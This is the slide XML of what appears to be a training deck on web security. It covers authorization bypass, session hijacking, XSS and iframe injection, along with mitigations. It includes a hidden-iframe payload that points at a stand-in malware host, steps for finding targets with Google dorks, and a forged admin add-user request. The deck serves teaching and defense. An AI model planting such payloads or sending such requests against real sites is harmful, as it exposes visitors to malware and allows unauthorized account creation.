          <a:lstStyle/>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Methods to bypass the authentication schema:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4187475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Testing for access to administrative functions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For example, suppose that the '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AddUser.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>' function is part of the administrative menu of the application, and it is possible to access it by requesting the following URL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  https://www.example.com/admin/addUser.jsp</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Test Authorization Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2859117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Then, the following HTTP request is generated when calling the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>AddUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>POST /admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>addUser.jsp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Host: www.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[other HTTP headers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>userID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>fakeuser&amp;role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>=3&amp;group=grp001</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>happens if a non-administrative user tries to execute that request? Will the user be created? If so, can the new user use their privileges?</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Test Authorization Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3818036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TCP session hijacking is a security attack on a user session over a protected network. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>most common method of session hijacking is called IP spoofing, when an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguising itself as one of the authenticated users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>type of attack is possible because authentication typically is only done at the start of a TCP session.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3330307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smtClean="0"/>
              <a:t>Authorization Bypass</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Maintain proper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>authorization schema.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Improper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>error handling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a default error </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>handler which </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>returns an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>appropriately sanitized </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>error message for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>most users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>production </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>for all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>error paths.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Vulnerable Remember Password</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ensure that no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>credentials are stored </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in clear text or are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>easily retrievable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in encoded or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>encrypted forms </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in cookies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>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3790128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Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a sniffer, can observe the communication between devices and collect the data that is transmitted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="725408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geeksforgeeks.org/wp-content/cdn-uploads/sess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600"/>
            <a:ext cx="4838700" cy="30575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edia.geeksforgeeks.org/wp-content/cdn-uploads/sessi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2" y="3675752"/>
            <a:ext cx="4791075"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996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b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross Site Scripting(XSS Attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker can also capture victim’s Session ID using XSS attack by using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3058032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IP Spoofing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Spoofing is pretending to be someone else. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>implementing this technique, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>attcker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2205149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Blind Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Session Hijacking</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="930552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Mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To defend a network with session hijacking, a defender has to implement both security measures at Application level and Network level. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>encryption can be provided by using protocols such as IPSEC, SSL, SSH etc. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Internet </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>security protocol (IPSEC) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2370055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Frame Injection is a type of Code Injection vulnerability classified by OWASP Top 10 2017 in its A1 Injection category. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-site </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scripting is naturally prioritized by bug bounty hunters since it seems easily exploitable and effective. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>But </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>malicious hackers are also attracted to this vulnerability, because there are aspects of the Frame Injection attack that can allow hackers to redirect users to other malicious websites used for phishing and similar attacks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Iframe Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99824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smtClean="0"/>
              <a:t>1. First </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of all attacker will find the Vulnerable websites using google dorks.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. They test the vulnerability by inserting some iframe tag using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. then insert the Malicious Iframe code inside the webpage.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For Example:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>he can insert this code using the url:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=”http://malwarewebpages/web.html” width=1 height=1 style=”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>visibility:hidden;position:absolute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>”&gt;&lt;/iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Iframe Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3733384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Change your passwords of ftp, control panel and database.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inform to your hosting service about the injection attack and they will take care of server injection .</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Download all your files from the hosting and  check whether they are infected or not. if you found any infected files, clean it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Buy a good antivirus software, Scan your Computer completely.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Don’t use the Public systems for logging into your Hosting service.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1" smtClean="0"/>
              <a:t>IFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t> Injection Mitigation</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2996785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ring Boot HTTP S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62000"/>
            <a:ext cx="6086475" cy="442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534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dirty="0"/>
              <a:t>Vulnerable </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Missing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Security Headers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Session </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Unused Ports/Services</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>LUCKY13</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Possible </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>Bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>Attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>HTML / </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" err="1"/>
              <a:t>iFrame</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> Injection </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2"/>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949939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oot-50_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5667375"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485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342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" dirty="0" smtClean="0"/>
              <a:t>JAAS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
